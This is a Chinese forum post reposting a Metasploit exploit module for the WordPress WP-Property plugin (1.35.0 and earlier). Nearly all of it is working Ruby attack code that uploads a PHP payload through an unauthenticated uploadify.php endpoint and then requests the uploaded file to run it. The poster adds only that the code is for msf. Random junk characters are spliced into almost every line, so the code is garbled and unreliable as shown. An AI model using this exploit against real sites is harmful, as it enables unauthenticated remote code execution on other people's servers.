WordPress WP-Property PHP 文件上传漏洞$ `# ]( Q N+ ]* ~' s. Y- C
1 P7 `0 e" G; ]# X# g6 u ## # This file is part of the Metasploit Framework and may be subject to6 ~! U# \, z- ]$ n
5 B& e5 @! t6 t A% n' Y. @2 a# redistribution and commercial restrictions. Please see the Metasploit
b+ J. o7 J2 G e& a
' S1 R' C% m/ ]5 A7 i% n# Framework web site for more information on licensing and terms of use.! s. I7 E7 d0 L$ }
0 o) `; B" j! C3 j* C3 T# http://metasploit.com/framework/ ##
9 t8 m7 Q4 E& Q; p. k
& n. v( ?$ y! t7 @: e3 a' W) d# ]- a
2 D7 k5 y* V$ W
) K. j1 y7 z- L8 s4 y' i6 n
, r9 {* |6 L6 g7 U' ?8 W/ }1 e4 @5 d4 H- w6 f5 o, q/ E
require 'msf/core'
8 j0 c# H2 X/ B. frequire 'msf/core/exploit/php_exe'. n) z- i, c' T3 ]4 |/ Q$ x
1 ]/ x; r- A$ @) @" Q. g+ p
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
% ]5 M: m% }) I4 d2 g! @5 s'Description' => %q{
/ {6 _) R( G; A, D- zThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>* F( i M& C/ ]' [
[
, o [2 L( d8 Z% d; \/ L2 {2 D& h'Sammy FORGIT', # initial discovery* W. u- f7 f) [) T' m
'James Fitts <fitts.james[at]gmail.com>' # metasploit module' Q7 J$ Y) {% w5 w8 M
],
3 s% n1 u% `- c9 s, P1 v'License' => MSF_LICENSE,5 O! Z" n6 L9 T/ g3 v
'References' =>$ n- G h! s3 |+ i: W# U: D
[" J; J" x7 X! u! s K
[ 'OSVDB', '82656' ],
& o ~. L+ T1 a/ W* P[ 'BID', '53787' ],
* f' c; e% j8 V& f1 k[ 'EDB', '18987'],. i/ A0 C9 b* }! }, L# S
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]& v, Z+ G6 ~' C" o `# `
],
% ^; M, K) } i; W0 T'Payload' =>- s, b9 N% A. A. y
{2 V1 x+ W/ |" t, L0 D7 P6 Z
'BadChars' => "\x00",3 v* Y# Z& H9 F5 m' p1 E
},
- x7 c# L& `" b$ f2 e. L'Platform' => 'php',
! ~/ |9 v0 w7 f( A# I'Arch' => ARCH_PHP,
# ?9 ?% ~: z" D'Targets' =>4 v" r# D& D5 ?/ W3 z% s+ T& [" B
[
. O: I7 I' F# _, T5 |1 S[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],$ C; `3 T) r; n
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 b" q) ?; b3 M8 U" ^0 X `3 |
],
2 h' B8 I. s X. |' A' ~ f4 E1 [. ~'DefaultTarget' => 0,
# Y3 l( F, F0 _) ['DisclosureDate' => 'Mar 26 2012'))$ V% G' r z' o9 V, ?; v b
* N6 T1 |3 p8 kregister_options(
8 ]5 j- S9 T/ H7 \# j$ F[. s5 |, o, a7 x J0 V
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
# o& w4 f z ~( X9 _. }/ c$ ?; F `], self.class)/ W2 W+ P9 H) @: M7 t
end% ^( W+ {1 s/ }; g8 T6 v
; R- c2 u' Q. k& c N5 h
def check0 m- m0 L2 `+ r. K% R0 p
uri = target_uri.path
" ]# B* c4 `! f6 m+ K4 L% D5 g* Luri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
7 l5 ]6 O/ N% z( \7 `9 k( R" D'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
1 d2 {2 b# z; `- i* o O})
' v" ?& V5 `0 e% v0 X: I+ P9 ~6 Y7 l' Q2 d7 n1 \
if not res or res.code != 200% u: C0 x' Z2 X4 l3 p5 U2 l) n
return Exploit::CheckCode::Unknown
4 y& B$ e6 d6 b4 f* L7 Q, r! aend m5 l: F y1 s8 ]6 ]; U/ e4 W
6 m! f0 w( t4 J; `
return Exploit::CheckCode::Appears
9 P( D3 j" T: G* E8 [' Iend/ h- ?0 y. P) z3 B% h
! D# |3 R- d k9 U* P5 n# k7 o' C
def exploit
6 P, F4 @0 k3 Uuri = target_uri.path! B# m/ `6 y x, B5 D) v2 x. n% C
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
2 {3 f! e: v8 N
9 c( l3 `, H1 I$ R9 W! ^- F( edata = Rex::MIME::Message.new
; ?: W/ G" q- f1 ~. P) Ydata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
8 d; `3 s) l1 l5 _( U) W# jdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
7 h U. S4 h: M( Q7 \ E! h3 m+ qpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')% ?! a. u$ s+ D! B' O
2 ^: W, O4 L: Q- ?! Zprint_status("#{peer} - Uploading payload #{@payload_name}")
; O/ g8 o0 s, z2 J5 [* R: u- dres = send_request_cgi({! C7 M; i. s: b2 s2 w/ g" z+ c
'method' => 'POST'," J6 V& O/ b3 M5 r/ w5 D
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",- ^' a/ x6 [& O; [
'ctype' => "multipart/form-data; boundary=#{data.bound}",
6 K# r9 k8 c4 `5 c$ v'data' => post_data2 J! [5 N. E* a q! K/ G7 M
})7 A: H8 {) U6 Y9 Y
5 o5 y% G5 ]: q Oif not res or res.code != 200 or res.body !~ /#{@payload_name}/ K. i9 {* C; E$ q6 B8 R7 @, O; B
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")+ o9 a- s+ _* S3 ^4 `
end
7 ?+ b2 j% p% q) F
8 j3 l$ L* ?. Pupload_uri = res.body# s. b4 x1 H( d! v
6 F$ l' V2 Y B. {- y3 I" t
print_status("#{peer} - Executing payload #{@payload_name}")) |, I# d2 [. D( r6 T
res = send_request_raw({
1 V. o7 ^; K7 t7 n! L. Y7 e; Y'uri' => upload_uri,* O$ B/ z% f: {1 f
'method' => 'GET'
* o) ^3 t f, m9 B# D})" Z' n" K# f/ ~5 c
end
+ Z6 A/ m6 |2 _$ s* M, O) zend0 ?+ N/ X+ M4 X4 S' S, u5 `
) I3 U0 I% N) m5 j R: V2 W
不要问我这写的是什么 怎么利用 我是说msf.$ u; U( O z u9 t. L+ O
1 \- C& h- d: N3 Y9 o* E |
发表于 2013-1-4 19:51:30
收藏
支持
反对